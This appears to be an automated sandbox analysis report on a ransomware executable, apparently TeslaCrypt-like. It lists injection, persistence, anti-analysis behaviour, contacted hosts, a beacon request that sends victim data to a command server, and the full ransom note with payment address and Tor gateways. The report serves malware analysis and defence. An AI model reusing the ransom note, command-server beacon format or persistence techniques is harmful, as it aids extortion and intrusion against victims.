Submission name: Set-up.exe
Analysis Overview
Other submission names
- Set-up install.exe
- Set-up.original.exe
- Set.up.exe
- Setup.exe
- file
Mime: application/x-dosexec
Operating System: Windows
Last Anti-Virus Scan: 08/05/2022 00:18:02 [UTC]
Last Sandbox Report: 08/03/2021 12:58:02 [UTC]
malicious
Threat Score: 65/100
Anti-Virus Results
- CrowdStrike Falcon [Static Analysis and ML]: 08/05/2022 00:18:02 [UTC] | N/A
- MetaDefender [Multi Scan Analysis]: 08/05/2022 00:18:02 [UTC]
- VirusTotal [Multi Scan Analysis]: 08/05/2022 00:18:02 [UTC]
Network Behavior: Contacts 2 domains and 2 hosts.
  - Wrote 106 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - 3/57 Antivirus vendors marked sample as malicious [5% detection rate] [Source: External System, Relevance: 10/10]
  - "" allocated 00000088 bytes of memory in "risjrov.exe" [Protection: "read/write"]
  - "" wrote 65536 bytes starting with PE header signature to file "%LOCALAPPDATA%\risjrov.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... [Source: API Call, Relevance: 1/10]
  - "" wrote 32 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - Found the following User-Agents: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022]
  - "All your documents, photos, databases and other important files have been encrypted Private decryption key is stored on a secret Internet server and nobody can Private decryption key is stored on a secret Internet server and nobody can If you see the main encryptor red window, examine it and follow the instructions. If you have problems with gates, use direct connection: If you see the main encryptor red window, examine it and follow the instructions. Otherwise, it seems that you or your antivirus deleted the encryptor program. Now you have the last chance to decrypt your files. Open in your browser one of the links: //iq3ahijcfeont3xx.fenaow48fn42.com //iq3ahijcfeont3xx.sm4i8smr3f43.com //iq3ahijcfeont3xx.tor2web.blutmagie.de They are public gates to the secret server. Copy and paste the following Bitcoin address in the input form on server. Avoid missprints. %s Follow the instructions on the server. If you have problems with gates, use direct connection: 1. Download Tor Browser from //torproject.org 2. In the Tor Browser open the //iq3ahijcfeont3xx.onion/"
Incident Response
Risk Assessment
Indicators
  - Wrote 292 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 66 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 48 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 185 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 293 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 234 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 519 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 98 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540]
  - Wrote 12 instructions to foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [UID: 00101562-00001540] [Source: Hybrid Analysis Technology, Relevance: 8/10]
  - "" allocated 00000088 bytes of memory in "cmd.exe" [Protection: "read/write"] [Source: API Call, Relevance: 7/10]
  - "" wrote 52 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 4 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 1024 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 234496 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 30208 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 27648 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 512 bytes to a foreign process "300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b" [PID: 00001540]
  - "" wrote 32 bytes to a foreign process "risjrov.exe" [PID: 00001380] [Source: API Call, Relevance: 6/10]
  - Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729] [Source: Network Traffic, Relevance: 5/10]
with strongest encryption RSA-2048 key, generated for this computer.
decrypt your files until y" [Source: 00113343-00002640-7731F918-128658, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted
with strongest encryption RSA-2048 key, generated for this computer.
decrypt your files un" [Source: 25712-59-004051C0, Indicator: "decrypt your files"]
"All your important files are encrypted!" [Source: 25712-918-00406200, Indicator: "files are encrypted"]
"The only copy of the private key, which will allow you to decrypt your files,is located on a secret TOR
server in the Internet; the server will eliminate the key after a time period specified in this window." [Source: 25712-918-00406200, Indicator: "decrypt your files"]
"iles until you pay and obtain the private key.
Otherwise, it seems that you or your antivirus deleted the encryptor program.
Now you have the last chance to decrypt your files.
Open in your browser one of the links:
//iq3ahijcfeont3xx.fenaow48fn42.com
//iq3ahijcfeont3xx.sm4i8smr3f43.com
//iq3ahijcfeont3xx.tor2web.blutmagie.de
They are public gates to the secret server.
Copy and paste the following Bitcoin address in the input form on
server. Avoid missprints.
%s
Follow the instructions on the server.
1. Download Tor Browser from //torproject.org
2. In the Tor Browser open the //iq3ahijcfeont3xx.onion/
Note that this server is available via Tor Browser only.
Retry in 1 hour if site is not reachable.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
%s
Follow the instructi" [Source: 00101562-00001540.00000000.104296.400000.00000040.mdmp, Indicator: "decrypt your files"]
"ur files until you pay and obtain the private key.
Note that this server is available via Tor Browser only.
Retry in 1 hour if site is not reachable.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints." [Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files"]
"which will allow you to decrypt your files,is located on a secret TOR" [Source: 00001540.000001C8.101453.0043B000.wprm, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted
with strongest encryption RSA-2048 key, generated for this computer.
Private decryption key is stored on a secret Internet server and nobody can
decrypt your files until you pay and obtain the private key.
If you see the main encryptor red window, examine it and follow the instructions.
Otherwise, it seems that you or your antivirus deleted the encryptor program.
Now you have the last chance to decrypt your files.
Open in your browser one of the links:
//iq3ahijcfeont3xx.fenaow48fn42.com
//iq3ahijcfeont3xx.sm4i8smr3f43.com
//iq3ahijcfeont3xx.tor2web.blutmagie.de
They are public gates to the secret server.
Copy and paste the following Bitcoin address in the input form on server. Avoid missprints.
16gpagzWUuxphi3ZwyjoXdqA5HUZR68mwa
Follow the instructions on the server.
If you have problems with gates, use direct connection:
1. Download Tor Browser from //torproject.org
2. In the" [Source: 00113343-00002640.00000001.149687.400000.00000040.mdmp, Indicator: "decrypt your files"]
"All your documents, photos, databases and other important files have been encrypted" [Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "files have been encrypted"]
"Private decryption key is stored on a secret Internet server and nobody can" [Source: HELP_RESTORE_FILES_stosh.TXT.128656, Indicator: "private decryption key"]
  - Found dropped filename "RECOVERY_FILE.TXT" which has been seen in the context of ransomware [Source: Extracted File, Relevance: 5/10]
- Accesses potentially sensitive information from local browsers
  - "risjrov.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" [Type: "FileHandle", Context: "NtSetInformationFile"]
  - "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat" [Type: "FileHandle", Context: "NtSetInformationFile"]
  - "risjrov.exe" had access to "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat" [Type: "FileHandle", Context: "NtSetInformationFile"] [Source: Touched Handle, Relevance: 5/10]
- Modifies proxy settings
  - "" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
  - "" [Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
  - "risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000"]
  - "risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER"]
  - "risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE"]
  - "risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"]
  - "risjrov.exe" [Access type: "DELETEVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS"] [Source: Registry Access, Relevance: 8/10]
- Queries/modifies the display settings of system associated file extensions
  - "" [Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "ALWAYSSHOWEXT"]
  - "" [Access type: "QUERYVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\CLASSES\SYSTEMFILEASSOCIATIONS\.EXE", Key: "NEVERSHOWEXT"] [Source: Registry Access, Relevance: 7/10]
- Contains native function calls
- Spawns a lot of processes
  - Spawned process ""
  - Spawned process ""
  - Spawned process "risjrov.exe"
  - Spawned process "risjrov.exe"
  - Spawned process "cmd.exe" with commandline "/c del C:\300DE5~1 >> NUL" [Source: Monitored Target, Relevance: 8/10]
- Anti-Detection/Stealthyness
- Sets the process error mode to suppress error box
  - "" set its error mode to SEM_NOOPENFILEERRORBOX
  - "risjrov.exe" set its error mode to SEM_NOOPENFILEERRORBOX [Source: API Call, Relevance: 8/10]
- Anti-Reverse Engineering
- Contains ability to register a top-level exception handler [often used as anti-debugging trick]
  - from PID 00001220
  - from PID 00001220
  - from PID 00001220
  - from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b [PID: 1220]
  - from PID 00001220
  - from PID 00001220
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540 [Source: Hybrid Analysis Technology, Relevance: 1/10]
- Environment Awareness
- Contains ability to query the machine version
- Possibly tries to detect the presence of a debugger
  - from PID 00001540
  - from PID 00001540
  - from PID 00002640
  - from PID 00002640 [Source: Hybrid Analysis Technology, Relevance: 1/10]
- Possibly tries to implement anti-virtualization techniques
  - "AdSv - vmsrvc.sys - Virtual Machines Additions Service" [Indicator: "vmsrvc"] [Source: String, Relevance: 4/10]
- Reads the cryptographic machine GUID
  - "risjrov.exe" [Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID"] [Source: Registry Access, Relevance: 10/10]
- General
- Reads configuration files
  - "" read file "C:\Windows\win.ini"
  - "" read file "%USERPROFILE%\Desktop\desktop.ini"
  - "risjrov.exe" read file "C:\Windows\win.ini"
  - "risjrov.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini" [Source: API Call, Relevance: 4/10]
- Installation/Persistance
- Drops executable files
  - "risjrov.exe" has type "PE32 executable [GUI] Intel 80386, for MS Windows" [Source: Extracted File, Relevance: 10/10]
- Modifies auto-execute functionality by setting a value in the registry
  - "risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS"]
  - "risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"]
  - "risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\USER\S-1-5-21-1663702577-2139711211-3687027567-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "%LOCALAPPDATA%\risjrov.exe"]
  - "risjrov.exe" [Access type: "CREATE", Path: "\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"]
  - "risjrov.exe" [Access type: "SETVAL", Path: "\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "MSCONFIG", Value: "C:\Users\%USERNAME%\AppData\Local\risjrov.exe"] [Source: Registry Access, Relevance: 8/10]
- Network Related
- Found potential IP address in binary/memory
  - "85.25.146.22" [Source: String, Relevance: 3/10]
- Found potential URL in binary/memory
  - "//ipinfo.io/ip"
  - "//iq3ahijcfeont3xx.fenaow48fn42.com/?enc=%s"
  - "//iq3ahijcfeont3xx.sm4i8smr3f43.com"
  - "//www.torproject.org/projects/torbrowser.html.en"
  - "//iq3ahijcfeont3xx.tor2web.blutmagie.de" [Source: String, Relevance: 2/10]
- Spyware/Information Retrieval
- Contains ability to enumerate processes/modules/threads
  - at 00113343-00002640-773301AA-121019
  - at 00113343-00002640-773301AA-121035
  - from PID 00002640
  - from risjrov.exe [PID: 2640] [Source: Hybrid Analysis Technology, Relevance: 5/10]
- Contains ability to open the clipboard
- System Destruction
- Marks file for deletion
  - "%LOCALAPPDATA%\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" for deletion
  - "C:\Users\%USERNAME%\AppData\Local\risjrov.exe" marked "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" for deletion [Source: API Call, Relevance: 10/10]
- Opens file with deletion access rights
  - "risjrov.exe" opened "C:\MSOCache\All Users\{90120000-006E-0407-0000-0000000FF1CE}-C\Microsoft.VC80.CRT.manifest" with delete access
  - "risjrov.exe" opened "%PROGRAMFILES%\Application Verifier [x64]\REDIST.TXT" with delete access
  - "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ip[1].txt" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\dml.doc" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\kernel_debugging_tutorial.doc" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\license.txt" with delete access
  - "risjrov.exe" opened "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\STFGKOG5\ping[1].htm" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\redist.txt" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\relnotes.txt" with delete access
  - "risjrov.exe" opened "C:\Program Files\Debugging Tools for Windows [x64]\sdk\samples\extcpp\readme.txt" with delete access [Source: API Call, Relevance: 7/10]
- System Security
- Adjusts debug privileges
  - "" adjusted SE_DEBUG_PRIVILEGE
  - "risjrov.exe" adjusted SE_DEBUG_PRIVILEGE [Source: API Call, Relevance: 3/10]
- Unusual Characteristics
- Imports suspicious APIs
  - GetThreadContext, CreateProcessW, LoadLibraryW, GetModuleFileNameW, GetProcAddress, VirtualAllocEx, WriteProcessMemory, GetModuleHandleW, GetCommandLineA, GetStartupInfoW, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, WriteFile, GetModuleFileNameA, GetTickCount, Sleep [Source: Static Parser, Relevance: 1/10]
- Reads information about supported languages
  - "risjrov.exe" [Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407"]
  - "cmd.exe" [Path: "\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE", Key: "00000407"] [Source: Registry Access, Relevance: 3/10]
- Environment Awareness
- Contains ability to query machine time
  - from PID 00001220
  - from 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b [PID: 1220]
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540
  - from PID 00001540
  - from PID 00001380
  - from risjrov.exe [PID: 1380] [Source: Hybrid Analysis Technology, Relevance: 1/10]
- General
- Contacts domains
  - "ipinfo.io"
  - "24u4jf7s4regu6hn.fenaow48fn42.com" [Source: Network Traffic, Relevance: 1/10]
- Contacts server
  - "54.93.61.143"
  - "104.27.142.176" [Source: Network Traffic, Relevance: 1/10]
- Creates mutants
  - "Local\ZonesCounterMutex"
  - "Local\ZoneAttributeCacheCounterMutex"
  - "Local\ZonesCacheCounterMutex"
  - "Local\ZonesLockedCacheCounterMutex"
  - "Local\_!MSFTHISTORY!_"
  - "Local\c:!users!pspubws!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
  - "Local\c:!users!pspubws!appdata!roaming!microsoft!windows!cookies!"
  - "Local\c:!users!pspubws!appdata!local!microsoft!windows!history!history.ie5!"
  - "Local\WininetStartupMutex"
  - "Local\WininetConnectionMutex" [Source: Created Mutant, Relevance: 3/10]
- GETs files from a webserver
  - "GET /ip HTTP/1.1
    User-Agent: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022]
    Host: ipinfo.io"
  - "GET /ping.php?U3ViamVjdD1QaW5nJmtleT02MzY3QkVENTYwMDBBNjBCMkYyQzhBNzJGRkNDNEU0ODA5NTY2MDY4QTczQTc0RDAwRjk4QzcxNThENzVBOEM1JmFkZHI9MTZncGFneldVdXhwaGkzWnd5am9YZHFBNUhVWlI2OG13YSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuNC4wYSZPUz03NjAxJklEPTg4JnN1YmlkPTAmZ2F0ZT1HMCZpc19hZG1pbj0xJmlzXzY0PTEmaXA9ODUuMjUuMTQ2LjIy HTTP/1.1
    User-Agent: Mozilla/4.0 [compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729]
    Host: 24u4jf7s4regu6hn.fenaow48fn42.com
    Connection: Keep-Alive" [Source: Network Traffic, Relevance: 5/10]
- Loads modules at runtime
  - "" loaded module "%WINDIR%\SYSTEM32\APPHELP.DLL" at base 747F0000
  - "" loaded module "PROPSYS.DLL" at base 74630000
  - "" loaded module "OLE32.DLL" at base 75250000
  - "" loaded module "COMCTL32.DLL" at base 74B40000
  - "" loaded module "OLEAUT32.DLL" at base 76CA0000
  - "" loaded module "ADVAPI32.DLL" at base 75A10000
  - "" loaded module "SHELL32.DLL" at base 75F50000
  - "" loaded module "C:\WINDOWS\SYSTEM32\PROPSYS.DLL" at base 74630000
  - "" loaded module "NTMARTA.DLL" at base 745C0000 [Source: API Call, Relevance: 1/10]
- Looks up procedures from modules [excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime]
  - ""
  - ""
  - ""
  - ""
  - ""
  - ""
  - ""
  - ""
  - ""
  - "" [Source: API Call, Relevance: 1/10]
- Runs shell commands
  - "/c del C:\300DE5~1 >> NUL" on 2015-05-14.17:06:09 [Source: Monitored Target, Relevance: 5/10]
- Installation/Persistance
- Contains ability to lookup the windows account name
  - at 00101562-00001540-773301AA-115708
  - at 00113343-00002640-773301AA-133152 [Source: Hybrid Analysis Technology, Relevance: 5/10]
- Dropped files
  - "risjrov.exe" has type "PE32 executable [GUI] Intel 80386, for MS Windows"
  - "storage.bin" has type "data"
  - "RECOVERY_FILE.TXT" has type "ASCII text, with CRLF line terminators"
  - "log.html" has type "HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators"
  - "HELP_RESTORE_FILES_stosh.TXT" has type "ASCII text, with CRLF line terminators"
  - "Microsoft.VC80.CRT.manifest" has type "XML document text"
  - "REDIST.TXT" has type "data"
  - "ip[1].txt" has type "ASCII text"
  - "dml.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0"
  - "kernel_debugging_tutorial.doc" has type "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0" [Source: Extracted File, Relevance: 3/10]
File Details
All Details: hfxtnsu.exe
Filename: hfxtnsu.exe
Size: 375KiB [383488 bytes]
Type: peexe executable
Description: PE32 executable [GUI] Intel 80386, for MS Windows
Architecture: WINDOWS
SHA256: 300de5e62ae85a0c85540fa39758ad4f8c11fa88c9a1d4a5e8f1291a0725566b
Classification [TrID]
- 67.3% [.EXE] Win32 Executable MS Visual C++ [generic]
- 14.2% [.DLL] Win32 Dynamic Link Library [generic]
- 9.7% [.EXE] Win32 Executable [generic]
- 4.3% [.EXE] Generic Win/DOS Executable
- 4.3% [.EXE] DOS Executable Generic
Screenshots
Hybrid Analysis
Analysed 5 processes in total.
Network Analysis
DNS Requests
HTTP Traffic
Extracted Files
Displaying 32 extracted file[s]. The remaining 251 file[s] are available in the full version and XML/JSON reports.
- HELP_RESTORE_FILES_stosh.TXT
- Microsoft.VC80.CRT.manifest
- REDIST.TXT
- dml.doc
  Size: 111KiB [113900 bytes]
  Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Debugger Markup, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Sep 21 08:00:00 2007, Create Time/Date: Sat Sep 22 00:03:00 2007, Last Saved Time/Date: Sat Sep 22 00:03:00 2007, Number of Pages: 11, Number of Words: 3195, Number of Characters: 16588, Security: 0
  MD5: 9759d0d191d542f59b657e5d308094bb
  SHA1: 04b43ba5b5add678ac7fbb1ca687b8c39e4bc666
  SHA256: d31f8885d924b3a5928b260b05f60f1afa4993e9f400950c7f3df9dfd2164f70
- kernel_debugging_tutorial.doc
  Size: 2.3MiB [2392300 bytes]
  Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Kernel Debugging with WinDbg Tutorial, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:25:00 2007, Last Saved Time/Date: Tue Sep 25 21:25:00 2007, Number of Pages: 64, Number of Words: 13581, Number of Characters: 75240, Security: 0
  MD5: 83e4a132a62e1a2fe3bbcc088681979d
  SHA1: a01140b6c34571c48db54e3bb0887acabbb60760
  SHA256: a91fd55fc64f0678ca6ecfbd409e1172cbc3536722335d52516ca554673942cb
- license.txt
- relnotes.txt
- readme.txt
- srcsrv.doc
  Size: 217KiB [222444 bytes]
  Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: Source Server, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Sat Jun 17 20:09:00 2006, Create Time/Date: Tue Sep 25 21:45:00 2007, Last Saved Time/Date: Thu Mar 20 22:48:00 2008, Number of Pages: 19, Number of Words: 6614, Number of Characters: 37706, Security: 0
  MD5: a7600489849fbeacc95d06ac70756d5c
  SHA1: 5cd7934d2a3b1c6628d2c407dd2c2f674b2bbe1d
  SHA256: 2bb9bec411d1e87d1d150e9b01bc919ac5d7bd415ebbd9b49652930bd1051651
- symhttp.doc
  Size: 542KiB [555244 bytes]
  Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: HTTP Symbol Stores and the Symbol Server Proxy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:49:00 2007, Last Saved Time/Date: Tue Sep 25 21:49:00 2007, Number of Pages: 19, Number of Words: 4139, Number of Characters: 21611, Security: 0
  MD5: 246be13e750d0023f720e9b449226f44
  SHA1: 719632fe06de246a473d0e2ce19af3da7aca9aea
  SHA256: 06c9ad0a058a1f52d21b8d69b4cb7d4a72618d6bb5e08d54e0522c18317ee136
- themes.doc
  Size: 1.1MiB [1102060 bytes]
  Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1252, Title: WinDbg Themes, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Last Printed: Tue Sep 25 08:00:00 2007, Create Time/Date: Tue Sep 25 21:04:00 2007, Last Saved Time/Date: Tue Sep 25 21:04:00 2007, Number of Pages: 6, Number of Words: 491, Number of Characters: 2780, Security: 0
  MD5: 4344b6b0cad35480dea522d4329a00af
  SHA1: 2a828e437afba57f61d4a9abcc8d5f7a91079983
  SHA256: f78f42c7c94f836631168213696575b9cff3902df7dc1acf4bfa69d8a6055e04
- pooltag.txt
- Mso Example Intl Setup File A.txt
- Mso Example Intl Setup File B.txt
- Mso Example Setup File A.txt
- troubleshootingtest.psd1
- sign.js
- fxref_Microsoft.JScript.Vsa.hxs
  Size: 301KiB [307832 bytes]
- fxref_Microsoft.SqlServer.Server.hxs
  Size: 1.2MiB [1213326 bytes]
- fxref_System.Data.Linq.Mapping.hxs
  Size: 985KiB [1008588 bytes]
- sample.docx
- omniprov.doc
  Size: 306KiB [313580 bytes]
- DbgSpec.doc
- testEE.cer
- contoso.cer
- contosoroot.cer
- TestCertificate.cer
- MigratingToAeroWizards.doc
  Size: 832KiB [852204 bytes]
- IFileIsInUse_sample.docx
  Size: 385KiB [393914 bytes]
- Using the System Folder View.doc
  Size: 519KiB [531692 bytes]
- risjrov.exe
- storage.bin
Notifications
- Not all strings are visible in the report, because the maximum number of strings was reached [5000]
- Parsed more than maximum number of dropped files [20], report might not contain information about some dropped files
- Some API calls are hidden from the report due to oversize